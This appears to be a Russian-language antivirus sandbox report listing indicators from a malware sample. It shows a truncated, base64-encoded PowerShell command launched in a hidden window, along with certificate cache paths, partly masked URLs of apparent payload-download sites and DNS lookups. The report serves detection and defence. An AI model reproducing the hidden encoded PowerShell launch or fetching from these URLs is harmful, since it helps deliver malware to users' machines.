Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://di####learning.cn/wp-includes/8merf/
- http://ca#####.##gitalcertvalidation.com/TrustAsiaTLSRSACA.crt
- http://www.te######aoutdoorliving.com/lpo7uw/0xua0vw/
- DNS ASK bo##ia.com
- DNS ASK di####learning.cn
- DNS ASK ca#####.##gitalcertvalidation.com
- DNS ASK te######aoutdoorliving.com
- DNS ASK mo####delzein.com
- DNS ASK in#####ial-parks.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...' (со скрытым окном)